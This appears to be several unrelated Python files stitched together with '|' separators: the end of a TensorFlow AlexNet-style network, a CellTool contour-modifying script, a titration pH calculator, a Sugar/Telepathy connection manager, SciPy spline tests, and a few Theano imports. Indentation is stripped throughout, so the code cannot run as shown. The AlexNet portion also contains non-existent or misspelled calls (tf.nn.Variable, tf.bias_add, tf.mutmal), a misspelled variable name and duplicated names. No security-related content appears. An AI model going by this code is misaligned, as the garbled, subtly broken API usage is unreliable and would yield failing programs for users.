lrn1 = tf.nn.lrn(conv1, 4, bias=1.0, alpha=0.001/9, beta=0.75, name="lrn1")
# pool1
# feature_map: 27*27*96
pool1 = tf.nn.max_pool(lrn1, ksize=[1,3,3,1], strides=[1,2,2,1], padding='VALID', name="pool1")
print_activations(pool1)
# conv2
with tf.name_scope("conv2") as scope:
kernel = tf.Variable(tf.truncated_normal([5,5,96,256], dtype = tf.float32, stddev=1e-1), name = "weitht")
# output: 27*27*256
conv = tf.nn.conv2d(pool1, kernel, [1,1,1,1], padding='SAME')
biases = tf.Variable(tf.constant(0.0, shape=[256], dtype=tf.float32), trainable=True, name = 'biases')
bias = tf.nn.bias_add(conv, biases)
# relu
conv2 = tf.nn.relu(bias, name=scope)
print_activations(conv2)
parameters += [kernel, biases]
# lrn2
lrn2 = tf.nn.lrn(conv2, 4, bias=1.0, alpha=0.001/9, beta=0.75, name="lrn2")
# pool2
# feature_map: 13*13*256
pool2 = tf.nn.max_pool(lrn2, ksize=[1,3,3,1], strides=[1,2,2,1], padding="VALID", name="pool2")
print_activations(pool2)
# conv3
with tf.name_scope("conv3") as scope:
kernel = tf.Variable(tf.truncated_normal([3,3,256,384], dtype=tf.float32, stddev=1e-1), name="weight")
# output: 13*13*384
conv = tf.nn.conv2d(pool2, kernel, [1,1,1,1], padding="SAME")
biases = tf.Variable(tf.constant(0.0, shape=[384], dtype=tf.float32), trainable=True, name = 'biases')
bias = tf.nn.bias_add(conv, biases)
# relu
conv3 = tf.nn.relu(bias, name=scope)
print_activations(conv3)
parameters += [kernel, biases]
# conv4
with tf.name_scope("conv4") as scope:
kernel = tf.Variable(tf.truncated_normal([3,3,384,384], dtype=tf.float32, stddev=1e-1), name="weight")
# output: 13*13*384
conv = tf.nn.conv2d(conv3, kernel, [1,1,1,1], padding="SAME")
biases = tf.Variable(tf.constant(0.0, shape=[384], dtype=tf.float32), trainable=True, name="biases")
bias = tf.nn.bias_add(conv, biases)
# relu
conv4 = tf.nn.relu(bias, name = scope)
print_activations(conv4)
parameters += [kernel, biases]
# conv5
with tf.name_scope("conv5") as scope:
kernel = tf.Variable(tf.truncated_normal([3,3,384,256], dtype=tf.float32, stddev=1e-1), name="weight")
# output: 13*13*256
conv = tf.nn.conv2d(conv4, kernel, [1,1,1,1], padding="SAME")
biases = tf.nn.Variable(tf.constant(0.0, shape=[256], dtype=tf.float32), trainable=True, name="biases")
bias = tf.bias_add(conv, biases)
# relu
conv5 = tf.nn.relu(bias, name=scope)
print_activations(conv5)
parameters += [kernel, biases]
# pool5
# feature_map: 6*6*256
pool5 = tf.nn.max_pool(conv5, ksize=[1,3,3,1], strides=[1,2,2,1], padding="VALID", name="pool5")
print_activations(pool5)
# fc1
dense1 = tf.reshape(pool5, [-1, 6*6*256])
wd1 = tf.nn.Variable(tf.truncated_normal([6*6*256, 4096], dtype=tf.float32, stddev=1e-1), name="wd1")
bd1 = tf.nn.Variable(tf.constant(0.0, shape=[4096], dtype=tf.float32), trainable=True, name="bd1")
dense1 = tf.nn.relu(tf.matmul(dense1, wd1) + bd1, name = "fc1")
dense1 = tf.nn.dropout(dense1, keep_prob)
# fc2
wd2 = tf.nn.Variable(tf.truncated_normal([4096, 4096], dtype=tf.float32, stddev=1e-1), name="wd2")
bd2 = tf.nn.Variable(tf.constant(0.0, shape=[4096], dtype=tf.float32), trainable=True, name="bd1")
dense2 = tf.nn.relu(tf.mutmal(dense1, wd2) + bd2, name="fc2")
dense2 = tf.nn.dropout(dense2, keep_prob)
# fc3
wd3 = tf.nn.Variable(tf.truncated_normal([4096, 1024], dtype=tf.float32, stddev=1e-1), name="wd2")
bd3 = tf.nn.Variable(tf.constant(0.0, shape=[1024], dtype=tf.float32), trainable=True, name="bd1")
out = tf.matmul(dense2, wd3) + bd3
return out
|
# Copyright 2007 Zachary Pincus
# This file is part of CellTool.
#
# CellTool is free software; you can redistribute it and/or modify
# it under the terms of version 2 of the GNU General Public License as
# published by the Free Software Foundation.
"""Geometrically modify a set of contours.
This tool can be used to alter contours by rotating or rescaling them, or by
changing the ordering of their points.
If the contours have landmark points, these points can be re-weighted by this
tool. (See the documentation for add_landmarks for more details.)
"""
import celltool.utility.optparse as optparse
import celltool.simple_interface as simple_interface
import celltool.utility.path as path
import cli_tools
usage = "usage: %prog [options] contour_1 ... contour_n"
parser = optparse.OptionParser(usage=usage, description=__doc__.strip(),
formatter=cli_tools.CelltoolFormatter())
parser.set_defaults(
show_progress=True,
destination='.'
)
parser.add_option('-q', '--quiet', action='store_false', dest='show_progress',
help='suppress progress bars and other status updates')
parser.add_option('-r', '--rotate', type='float', metavar='ANGLE',
help='rotate each contour counter-clockwise by ANGLE (in degrees)')
parser.add_option('-s', '--scale', action='store', type='float', metavar='FACTOR',
help='rescale the contours by multiplicative FACTOR')
parser.add_option('-u', '--units', action='store',
help='name of the (new) units for the contours')
parser.add_option('-f', '--first-point', type='int', metavar='POINT',
help='make point number POINT the new first point in the contour points')
parser.add_option('-w', '--weight', action='append', dest='weights',
type='float', metavar='WEIGHT',
help='set the weight shared by all contours to WEIGHT (if specified once), or set the weight of the nth landmark to WEIGHT (if specified multiply)')
parser.add_option('-d', '--destination', metavar='DIRECTORY',
help='directory in which to write the output contours [default: %default]')
def main(name, arguments):
parser.prog = name
options, args = parser.parse_args(arguments)
args = cli_tools.glob_args(args)
if len(args) == 0:
raise ValueError('Some contour files must be specified!')
filenames = [path.path(arg) for arg in args]
contours = simple_interface.load_contours(filenames, show_progress = options.show_progress)
if options.first_point is not None:
options.first_point -= 1
if options.scale is not None or options.rotate is not None or options.units is not None or options.first_point is not None:
in_radians = False
if options.units is not None and options.units.lower() in ('um', 'micron', 'microns'):
options.units = u'\N{MICRO SIGN}m'
contours = simple_interface.transform_contours(contours, options.scale, options.rotate, in_radians,
options.units, options.first_point, options.show_progress, title = 'Modifying Contours')
if options.weights is not None:
contours = simple_interface.reweight_landmarks(contours, options.weights, options.show_progress)
destination = path.path(options.destination)
if not destination.exists():
destination.makedirs()
# note that with path objects, the '/' operator means 'join path components.'
names = [destination / filename.name for filename in filenames]
simple_interface.save_contours(contours, names, options.show_progress)
if __name__ == '__main__':
import sys
import os
main(os.path.basename(sys.argv[0]), sys.argv[1:])
|
# Titration calculator. By Anjan Momi.
# {Calculates the pH at various stages of the titration of a strong acid against a strong base.}
# Copyright (C) {2014} {Anjandev Momi}
# Contact me at [email protected]
# Use http://www.codeskulptor.org/ to run this program.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import math
vol_OH = float(input("Enter the Volume of OH-"))
# Change this to your needs
vol_H3O = 25.0
concentration_OH = 0.1
concentration_H3O = 0.1
concentration_OH = concentration_OH * vol_OH / (vol_H3O + vol_OH)
concentration_H = concentration_H3O * vol_H3O / (vol_H3O + vol_OH)
# This could happen behind the scenes but I feel more
# certain about the numbers this program outputs if
# I can see the input.
print "concentration of OH- is", concentration_OH
print "concentration of H3O+ is",concentration_H
if concentration_OH == concentration_H:
print "Neutral. pH = 7"
elif concentration_OH > concentration_H:
excess_OH = concentration_OH - concentration_H
print math.log(excess_OH, 10) + 14
else:
excess_H3O = concentration_H - concentration_OH
print - math.log(excess_H3O, 10)
|
# Copyright (C) 2010 Collabora Ltd. <http://www.collabora.co.uk/>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place - Suite 330,
# Boston, MA 02111-1307, USA.
"""
UNSTABLE. It should really be internal to the sugar.presence package.
"""
from functools import partial
import dbus
from dbus import PROPERTIES_IFACE
from telepathy.interfaces import ACCOUNT, \
ACCOUNT_MANAGER
from telepathy.constants import CONNECTION_STATUS_CONNECTED
ACCOUNT_MANAGER_SERVICE = 'org.freedesktop.Telepathy.AccountManager'
ACCOUNT_MANAGER_PATH = '/org/freedesktop/Telepathy/AccountManager'
class Connection(object):
def __init__(self, account_path, connection):
self.account_path = account_path
self.connection = connection
self.connected = False
class ConnectionManager(object):
"""Track available telepathy connections"""
def __init__(self):
self._connections_per_account = {}
bus = dbus.SessionBus()
obj = bus.get_object(ACCOUNT_MANAGER_SERVICE, ACCOUNT_MANAGER_PATH)
account_manager = dbus.Interface(obj, ACCOUNT_MANAGER)
account_paths = account_manager.Get(ACCOUNT_MANAGER, 'ValidAccounts',
dbus_interface=PROPERTIES_IFACE)
for account_path in account_paths:
obj = bus.get_object(ACCOUNT_MANAGER_SERVICE, account_path)
obj.connect_to_signal('AccountPropertyChanged',
partial(self.__account_property_changed_cb, account_path))
connection_path = obj.Get(ACCOUNT, 'Connection')
if connection_path != '/':
self._track_connection(account_path, connection_path)
def __account_property_changed_cb(self, account_path, properties):
if 'Connection' not in properties:
return
if properties['Connection'] == '/':
if account_path in self._connections_per_account:
del self._connections_per_account[account_path]
else:
self._track_connection(account_path, properties['Connection'])
def _track_connection(self, account_path, connection_path):
connection_name = connection_path.replace('/', '.')[1:]
bus = dbus.SessionBus()
connection = bus.get_object(connection_name, connection_path)
connection.connect_to_signal('StatusChanged',
partial(self.__status_changed_cb, account_path))
self._connections_per_account[account_path] = \
Connection(account_path, connection)
account = bus.get_object(ACCOUNT_MANAGER_SERVICE, account_path)
status = account.Get(ACCOUNT, 'ConnectionStatus')
if status == CONNECTION_STATUS_CONNECTED:
self._connections_per_account[account_path].connected = True
else:
self._connections_per_account[account_path].connected = False
def __status_changed_cb(self, account_path, status, reason):
if status == CONNECTION_STATUS_CONNECTED:
self._connections_per_account[account_path].connected = True
else:
self._connections_per_account[account_path].connected = False
def get_preferred_connection(self):
best_connection = None, None
for account_path, connection in self._connections_per_account.items():
if 'salut' in account_path and connection.connected:
best_connection = account_path, connection.connection
elif 'gabble' in account_path and connection.connected:
best_connection = account_path, connection.connection
break
return best_connection
def get_connection(self, account_path):
return self._connections_per_account[account_path].connection
def get_connections_per_account(self):
return self._connections_per_account
def get_account_for_connection(self, connection_path):
for account_path, connection in self._connections_per_account.items():
if connection.connection.object_path == connection_path:
return account_path
return None
_connection_manager = None
def get_connection_manager():
global _connection_manager
if not _connection_manager:
_connection_manager = ConnectionManager()
return _connection_manager
|
#!/usr/bin/env python
# Created by Pearu Peterson, June 2003
from __future__ import division, print_function, absolute_import
import warnings
import numpy as np
from numpy.testing import (assert_equal, assert_almost_equal, assert_array_equal,
assert_array_almost_equal, assert_allclose, assert_raises, TestCase,
run_module_suite)
from numpy import array, diff, linspace, meshgrid, ones, pi, shape
from scipy.interpolate.fitpack import bisplrep, bisplev
from scipy.interpolate.fitpack2 import (UnivariateSpline,
LSQUnivariateSpline, InterpolatedUnivariateSpline,
LSQBivariateSpline, SmoothBivariateSpline, RectBivariateSpline,
LSQSphereBivariateSpline, SmoothSphereBivariateSpline,
RectSphereBivariateSpline)
class TestUnivariateSpline(TestCase):
def test_linear_constant(self):
x = [1,2,3]
y = [3,3,3]
lut = UnivariateSpline(x,y,k=1)
assert_array_almost_equal(lut.get_knots(),[1,3])
assert_array_almost_equal(lut.get_coeffs(),[3,3])
assert_almost_equal(lut.get_residual(),0.0)
assert_array_almost_equal(lut([1,1.5,2]),[3,3,3])
def test_preserve_shape(self):
x = [1, 2, 3]
y = [0, 2, 4]
lut = UnivariateSpline(x, y, k=1)
arg = 2
assert_equal(shape(arg), shape(lut(arg)))
assert_equal(shape(arg), shape(lut(arg, nu=1)))
arg = [1.5, 2, 2.5]
assert_equal(shape(arg), shape(lut(arg)))
assert_equal(shape(arg), shape(lut(arg, nu=1)))
def test_linear_1d(self):
x = [1,2,3]
y = [0,2,4]
lut = UnivariateSpline(x,y,k=1)
assert_array_almost_equal(lut.get_knots(),[1,3])
assert_array_almost_equal(lut.get_coeffs(),[0,4])
assert_almost_equal(lut.get_residual(),0.0)
assert_array_almost_equal(lut([1,1.5,2]),[0,1,2])
def test_subclassing(self):
# See #731
class ZeroSpline(UnivariateSpline):
def __call__(self, x):
return 0*array(x)
sp = ZeroSpline([1,2,3,4,5], [3,2,3,2,3], k=2)
assert_array_equal(sp([1.5, 2.5]), [0., 0.])
def test_empty_input(self):
# Test whether empty input returns an empty output. Ticket 1014
x = [1,3,5,7,9]
y = [0,4,9,12,21]
spl = UnivariateSpline(x, y, k=3)
assert_array_equal(spl([]), array([]))
def test_resize_regression(self):
"""Regression test for #1375."""
x = [-1., -0.65016502, -0.58856235, -0.26903553, -0.17370892,
-0.10011001, 0., 0.10011001, 0.17370892, 0.26903553, 0.58856235,
0.65016502, 1.]
y = [1.,0.62928599, 0.5797223, 0.39965815, 0.36322694, 0.3508061,
0.35214793, 0.3508061, 0.36322694, 0.39965815, 0.5797223,
0.62928599, 1.]
w = [1.00000000e+12, 6.88875973e+02, 4.89314737e+02, 4.26864807e+02,
6.07746770e+02, 4.51341444e+02, 3.17480210e+02, 4.51341444e+02,
6.07746770e+02, 4.26864807e+02, 4.89314737e+02, 6.88875973e+02,
1.00000000e+12]
spl = UnivariateSpline(x=x, y=y, w=w, s=None)
desired = array([0.35100374, 0.51715855, 0.87789547, 0.98719344])
assert_allclose(spl([0.1, 0.5, 0.9, 0.99]), desired, atol=5e-4)
def test_out_of_range_regression(self):
# Test different extrapolation modes. See ticket 3557
x = np.arange(5, dtype=np.float)
y = x**3
xp = linspace(-8, 13, 100)
xp_zeros = xp.copy()
xp_zeros[np.logical_or(xp_zeros < 0., xp_zeros > 4.)] = 0
xp_clip = xp.copy()
xp_clip[xp_clip < x[0]] = x[0]
xp_clip[xp_clip > x[-1]] = x[-1]
for cls in [UnivariateSpline, InterpolatedUnivariateSpline]:
spl = cls(x=x, y=y)
for ext in [0, 'extrapolate']:
assert_allclose(spl(xp, ext=ext), xp**3, atol=1e-16)
assert_allclose(cls(x, y, ext=ext)(xp), xp**3, atol=1e-16)
for ext in [1, 'zeros']:
assert_allclose(spl(xp, ext=ext), xp_zeros**3, atol=1e-16)
assert_allclose(cls(x, y, ext=ext)(xp), xp_zeros**3, atol=1e-16)
for ext in [2, 'raise']:
assert_raises(ValueError, spl, xp, **dict(ext=ext))
for ext in [3, 'const']:
assert_allclose(spl(xp, ext=ext), xp_clip**3, atol=1e-16)
assert_allclose(cls(x, y, ext=ext)(xp), xp_clip**3, atol=1e-16)
# also test LSQUnivariateSpline [which needs explicit knots]
t = spl.get_knots()[3:4] # interior knots w/ default k=3
spl = LSQUnivariateSpline(x, y, t)
assert_allclose(spl(xp, ext=0), xp**3, atol=1e-16)
assert_allclose(spl(xp, ext=1), xp_zeros**3, atol=1e-16)
assert_raises(ValueError, spl, xp, **dict(ext=2))
assert_allclose(spl(xp, ext=3), xp_clip**3, atol=1e-16)
# also make sure that unknown values for `ext` are caught early
for ext in [-1, 'unknown']:
spl = UnivariateSpline(x, y)
assert_raises(ValueError, spl, xp, **dict(ext=ext))
assert_raises(ValueError, UnivariateSpline,
**dict(x=x, y=y, ext=ext))
def test_lsq_fpchec(self):
xs = np.arange(100) * 1.
ys = np.arange(100) * 1.
knots = np.linspace(0, 99, 10)
bbox = (-1, 101)
assert_raises(ValueError, LSQUnivariateSpline, xs, ys, knots,
bbox=bbox)
def test_derivative_and_antiderivative(self):
# Thin wrappers to splder/splantider, so light smoke test only.
x = np.linspace(0, 1, 70)**3
y = np.cos(x)
spl = UnivariateSpline(x, y, s=0)
spl2 = spl.antiderivative(2).derivative(2)
assert_allclose(spl(0.3), spl2(0.3))
spl2 = spl.antiderivative(1)
assert_allclose(spl2(0.6) - spl2(0.2),
spl.integral(0.2, 0.6))
def test_nan(self):
# bail out early if the input data contains nans
x = np.arange(10, dtype=float)
y = x**3
for z in [np.nan, np.inf, -np.inf]:
y[-1] = z
assert_raises(ValueError, UnivariateSpline,
**dict(x=x, y=y, check_finite=True))
class TestLSQBivariateSpline(TestCase):
# NOTE: The systems in this test class are rank-deficient
def test_linear_constant(self):
x = [1,1,1,2,2,2,3,3,3]
y = [1,2,3,1,2,3,1,2,3]
z = [3,3,3,3,3,3,3,3,3]
s = 0.1
tx = [1+s,3-s]
ty = [1+s,3-s]
lut = LSQBivariateSpline(x,y,z,tx,ty,kx=1,ky=1)
assert_almost_equal(lut(2,2), 3.)
def test_bilinearity(self):
x = [1,1,1,2,2,2,3,3,3]
y = [1,2,3,1,2,3,1,2,3]
z = [0,7,8,3,4,7,1,3,4]
s = 0.1
tx = [1+s,3-s]
ty = [1+s,3-s]
with warnings.catch_warnings():
# This seems to fail (ier=1, see ticket 1642).
warnings.simplefilter('ignore', UserWarning)
lut = LSQBivariateSpline(x,y,z,tx,ty,kx=1,ky=1)
tx, ty = lut.get_knots()
for xa, xb in zip(tx[:-1], tx[1:]):
for ya, yb in zip(ty[:-1], ty[1:]):
for t in [0.1, 0.5, 0.9]:
for s in [0.3, 0.4, 0.7]:
xp = xa*(1-t) + xb*t
yp = ya*(1-s) + yb*s
zp = (+ lut(xa, ya)*(1-t)*(1-s)
+ lut(xb, ya)*t*(1-s)
+ lut(xa, yb)*(1-t)*s
+ lut(xb, yb)*t*s)
assert_almost_equal(lut(xp,yp), zp)
def test_integral(self):
x = [1,1,1,2,2,2,8,8,8]
y = [1,2,3,1,2,3,1,2,3]
z = array([0,7,8,3,4,7,1,3,4])
s = 0.1
tx = [1+s,3-s]
ty = [1+s,3-s]
lut = LSQBivariateSpline(x,y,z,tx,ty,kx=1,ky=1)
tx, ty = lut.get_knots()
tz = lut(tx, ty)
trpz = .25*(diff(tx)[:,None]*diff(ty)[None,:]
* (tz[:-1,:-1]+tz[1:,:-1]+tz[:-1,1:]+tz[1:,1:])).sum()
assert_almost_equal(lut.integral(tx[0], tx[-1], ty[0], ty[-1]), trpz)
def test_empty_input(self):
# Test whether empty inputs returns an empty output. Ticket 1014
x = [1,1,1,2,2,2,3,3,3]
y = [1,2,3,1,2,3,1,2,3]
z = [3,3,3,3,3,3,3,3,3]
s = 0.1
tx = [1+s,3-s]
ty = [1+s,3-s]
lut = LSQBivariateSpline(x,y,z,tx,ty,kx=1,ky=1)
assert_array_equal(lut([], []), np.zeros((0,0)))
assert_array_equal(lut([], [], grid=False), np.zeros((0,)))
class TestSmoothBivariateSpline(TestCase):
def test_linear_constant(self):
x = [1,1,1,2,2,2,3,3,3]
y = [1,2,3,1,2,3,1,2,3]
z = [3,3,3,3,3,3,3,3,3]
lut = SmoothBivariateSpline(x,y,z,kx=1,ky=1)
assert_array_almost_equal(lut.get_knots(),([1,1,3,3],[1,1,3,3]))
assert_array_almost_equal(lut.get_coeffs(),[3,3,3,3])
assert_almost_equal(lut.get_residual(),0.0)
assert_array_almost_equal(lut([1,1.5,2],[1,1.5]),[[3,3],[3,3],[3,3]])
def test_linear_1d(self):
x = [1,1,1,2,2,2,3,3,3]
y = [1,2,3,1,2,3,1,2,3]
z = [0,0,0,2,2,2,4,4,4]
lut = SmoothBivariateSpline(x,y,z,kx=1,ky=1)
assert_array_almost_equal(lut.get_knots(),([1,1,3,3],[1,1,3,3]))
assert_array_almost_equal(lut.get_coeffs(),[0,0,4,4])
assert_almost_equal(lut.get_residual(),0.0)
assert_array_almost_equal(lut([1,1.5,2],[1,1.5]),[[0,0],[1,1],[2,2]])
def test_integral(self):
x = [1,1,1,2,2,2,4,4,4]
y = [1,2,3,1,2,3,1,2,3]
z = array([0,7,8,3,4,7,1,3,4])
with warnings.catch_warnings():
# This seems to fail (ier=1, see ticket 1642).
warnings.simplefilter('ignore', UserWarning)
lut = SmoothBivariateSpline(x, y, z, kx=1, ky=1, s=0)
tx = [1,2,4]
ty = [1,2,3]
tz = lut(tx, ty)
trpz = .25*(diff(tx)[:,None]*diff(ty)[None,:]
* (tz[:-1,:-1]+tz[1:,:-1]+tz[:-1,1:]+tz[1:,1:])).sum()
assert_almost_equal(lut.integral(tx[0], tx[-1], ty[0], ty[-1]), trpz)
lut2 = SmoothBivariateSpline(x, y, z, kx=2, ky=2, s=0)
assert_almost_equal(lut2.integral(tx[0], tx[-1], ty[0], ty[-1]), trpz,
decimal=0) # the quadratures give 23.75 and 23.85
tz = lut(tx[:-1], ty[:-1])
trpz = .25*(diff(tx[:-1])[:,None]*diff(ty[:-1])[None,:]
* (tz[:-1,:-1]+tz[1:,:-1]+tz[:-1,1:]+tz[1:,1:])).sum()
assert_almost_equal(lut.integral(tx[0], tx[-2], ty[0], ty[-2]), trpz)
def test_rerun_lwrk2_too_small(self):
# in this setting, lwrk2 is too small in the default run. Here we
# check for equality with the bisplrep/bisplev output because there,
# an automatic re-run of the spline representation is done if ier>10.
x = np.linspace(-2, 2, 80)
y = np.linspace(-2, 2, 80)
z = x + y
xi = np.linspace(-1, 1, 100)
yi = np.linspace(-2, 2, 100)
tck = bisplrep(x, y, z)
res1 = bisplev(xi, yi, tck)
interp_ = SmoothBivariateSpline(x, y, z)
res2 = interp_(xi, yi)
assert_almost_equal(res1, res2)
class TestLSQSphereBivariateSpline(TestCase):
def setUp(self):
# define the input data and coordinates
ntheta, nphi = 70, 90
theta = linspace(0.5/(ntheta - 1), 1 - 0.5/(ntheta - 1), ntheta) * pi
phi = linspace(0.5/(nphi - 1), 1 - 0.5/(nphi - 1), nphi) * 2. * pi
data = ones((theta.shape[0], phi.shape[0]))
# define knots and extract data values at the knots
knotst = theta[::5]
knotsp = phi[::5]
knotdata = data[::5, ::5]
# calculate spline coefficients
lats, lons = meshgrid(theta, phi)
lut_lsq = LSQSphereBivariateSpline(lats.ravel(), lons.ravel(),
data.T.ravel(), knotst, knotsp)
self.lut_lsq = lut_lsq
self.data = knotdata
self.new_lons, self.new_lats = knotsp, knotst
def test_linear_constant(self):
assert_almost_equal(self.lut_lsq.get_residual(), 0.0)
assert_array_almost_equal(self.lut_lsq(self.new_lats, self.new_lons),
self.data)
def test_empty_input(self):
assert_array_almost_equal(self.lut_lsq([], []), np.zeros((0,0)))
assert_array_almost_equal(self.lut_lsq([], [], grid=False), np.zeros((0,)))
class TestSmoothSphereBivariateSpline(TestCase):
def setUp(self):
theta = array([.25*pi, .25*pi, .25*pi, .5*pi, .5*pi, .5*pi, .75*pi,
.75*pi, .75*pi])
phi = array([.5 * pi, pi, 1.5 * pi, .5 * pi, pi, 1.5 * pi, .5 * pi, pi,
1.5 * pi])
r = array([3, 3, 3, 3, 3, 3, 3, 3, 3])
self.lut = SmoothSphereBivariateSpline(theta, phi, r, s=1E10)
def test_linear_constant(self):
assert_almost_equal(self.lut.get_residual(), 0.)
assert_array_almost_equal(self.lut([1, 1.5, 2],[1, 1.5]),
[[3, 3], [3, 3], [3, 3]])
def test_empty_input(self):
assert_array_almost_equal(self.lut([], []), np.zeros((0,0)))
assert_array_almost_equal(self.lut([], [], grid=False), np.zeros((0,)))
class TestRectBivariateSpline(TestCase):
def test_defaults(self):
x = array([1,2,3,4,5])
y = array([1,2,3,4,5])
z = array([[1,2,1,2,1],[1,2,1,2,1],[1,2,3,2,1],[1,2,2,2,1],[1,2,1,2,1]])
lut = RectBivariateSpline(x,y,z)
assert_array_almost_equal(lut(x,y),z)
def test_evaluate(self):
x = array([1,2,3,4,5])
y = array([1,2,3,4,5])
z = array([[1,2,1,2,1],[1,2,1,2,1],[1,2,3,2,1],[1,2,2,2,1],[1,2,1,2,1]])
lut = RectBivariateSpline(x,y,z)
xi = [1, 2.3, 5.3, 0.5, 3.3, 1.2, 3]
yi = [1, 3.3, 1.2, 4.0, 5.0, 1.0, 3]
zi = lut.ev(xi, yi)
zi2 = array([lut(xp, yp)[0,0] for xp, yp in zip(xi, yi)])
assert_almost_equal(zi, zi2)
def test_derivatives_grid(self):
x = array([1,2,3,4,5])
y = array([1,2,3,4,5])
z = array([[1,2,1,2,1],[1,2,1,2,1],[1,2,3,2,1],[1,2,2,2,1],[1,2,1,2,1]])
dx = array([[0,0,-20,0,0],[0,0,13,0,0],[0,0,4,0,0],
[0,0,-11,0,0],[0,0,4,0,0]])/6.
dy = array([[4,-1,0,1,-4],[4,-1,0,1,-4],[0,1.5,0,-1.5,0],
[2,.25,0,-.25,-2],[4,-1,0,1,-4]])
dxdy = array([[40,-25,0,25,-40],[-26,16.25,0,-16.25,26],
[-8,5,0,-5,8],[22,-13.75,0,13.75,-22],[-8,5,0,-5,8]])/6.
lut = RectBivariateSpline(x,y,z)
assert_array_almost_equal(lut(x,y,dx=1),dx)
assert_array_almost_equal(lut(x,y,dy=1),dy)
assert_array_almost_equal(lut(x,y,dx=1,dy=1),dxdy)
def test_derivatives(self):
x = array([1,2,3,4,5])
y = array([1,2,3,4,5])
z = array([[1,2,1,2,1],[1,2,1,2,1],[1,2,3,2,1],[1,2,2,2,1],[1,2,1,2,1]])
dx = array([0,0,2./3,0,0])
dy = array([4,-1,0,-.25,-4])
dxdy = array([160,65,0,55,32])/24.
lut = RectBivariateSpline(x,y,z)
assert_array_almost_equal(lut(x,y,dx=1,grid=False),dx)
assert_array_almost_equal(lut(x,y,dy=1,grid=False),dy)
assert_array_almost_equal(lut(x,y,dx=1,dy=1,grid=False),dxdy)
def test_broadcast(self):
x = array([1,2,3,4,5])
y = array([1,2,3,4,5])
z = array([[1,2,1,2,1],[1,2,1,2,1],[1,2,3,2,1],[1,2,2,2,1],[1,2,1,2,1]])
lut = RectBivariateSpline(x,y,z)
assert_allclose(lut(x, y), lut(x[:,None], y[None,:], grid=False))
class TestRectSphereBivariateSpline(TestCase):
def test_defaults(self):
y = linspace(0.01, 2*pi-0.01, 7)
x = linspace(0.01, pi-0.01, 7)
z = array([[1,2,1,2,1,2,1],[1,2,1,2,1,2,1],[1,2,3,2,1,2,1],
[1,2,2,2,1,2,1],[1,2,1,2,1,2,1],[1,2,2,2,1,2,1],
[1,2,1,2,1,2,1]])
lut = RectSphereBivariateSpline(x,y,z)
assert_array_almost_equal(lut(x,y),z)
def test_evaluate(self):
y = linspace(0.01, 2*pi-0.01, 7)
x = linspace(0.01, pi-0.01, 7)
z = array([[1,2,1,2,1,2,1],[1,2,1,2,1,2,1],[1,2,3,2,1,2,1],
[1,2,2,2,1,2,1],[1,2,1,2,1,2,1],[1,2,2,2,1,2,1],
[1,2,1,2,1,2,1]])
lut = RectSphereBivariateSpline(x,y,z)
yi = [0.2, 1, 2.3, 2.35, 3.0, 3.99, 5.25]
xi = [1.5, 0.4, 1.1, 0.45, 0.2345, 1., 0.0001]
zi = lut.ev(xi, yi)
zi2 = array([lut(xp, yp)[0,0] for xp, yp in zip(xi, yi)])
assert_almost_equal(zi, zi2)
def test_derivatives_grid(self):
y = linspace(0.01, 2*pi-0.01, 7)
x = linspace(0.01, pi-0.01, 7)
z = array([[1,2,1,2,1,2,1],[1,2,1,2,1,2,1],[1,2,3,2,1,2,1],
[1,2,2,2,1,2,1],[1,2,1,2,1,2,1],[1,2,2,2,1,2,1],
[1,2,1,2,1,2,1]])
lut = RectSphereBivariateSpline(x,y,z)
y = linspace(0.02, 2*pi-0.02, 7)
x = linspace(0.02, pi-0.02, 7)
assert_allclose(lut(x, y, dtheta=1), _numdiff_2d(lut, x, y, dx=1),
rtol=1e-4, atol=1e-4)
assert_allclose(lut(x, y, dphi=1), _numdiff_2d(lut, x, y, dy=1),
rtol=1e-4, atol=1e-4)
assert_allclose(lut(x, y, dtheta=1, dphi=1), _numdiff_2d(lut, x, y, dx=1, dy=1, eps=1e-6),
rtol=1e-3, atol=1e-3)
def test_derivatives(self):
y = linspace(0.01, 2*pi-0.01, 7)
x = linspace(0.01, pi-0.01, 7)
z = array([[1,2,1,2,1,2,1],[1,2,1,2,1,2,1],[1,2,3,2,1,2,1],
[1,2,2,2,1,2,1],[1,2,1,2,1,2,1],[1,2,2,2,1,2,1],
[1,2,1,2,1,2,1]])
lut = RectSphereBivariateSpline(x,y,z)
y = linspace(0.02, 2*pi-0.02, 7)
x = linspace(0.02, pi-0.02, 7)
assert_equal(lut(x, y, dtheta=1, grid=False).shape, x.shape)
assert_allclose(lut(x, y, dtheta=1, grid=False),
_numdiff_2d(lambda x,y: lut(x,y,grid=False), x, y, dx=1),
rtol=1e-4, atol=1e-4)
assert_allclose(lut(x, y, dphi=1, grid=False),
_numdiff_2d(lambda x,y: lut(x,y,grid=False), x, y, dy=1),
rtol=1e-4, atol=1e-4)
assert_allclose(lut(x, y, dtheta=1, dphi=1, grid=False),
_numdiff_2d(lambda x,y: lut(x,y,grid=False), x, y, dx=1, dy=1, eps=1e-6),
rtol=1e-3, atol=1e-3)
def _numdiff_2d(func, x, y, dx=0, dy=0, eps=1e-8):
if dx == 0 and dy == 0:
return func(x, y)
elif dx == 1 and dy == 0:
return (func(x + eps, y) - func(x - eps, y)) / (2*eps)
elif dx == 0 and dy == 1:
return (func(x, y + eps) - func(x, y - eps)) / (2*eps)
elif dx == 1 and dy == 1:
return (func(x + eps, y + eps) - func(x - eps, y + eps)
- func(x + eps, y - eps) + func(x - eps, y - eps)) / (2*eps)**2
else:
raise ValueError("invalid derivative order")
if __name__ == "__main__":
run_module_suite()
|
import ipdb
import numpy as np
import theano
import theano.tensor as T
from os import sys, path
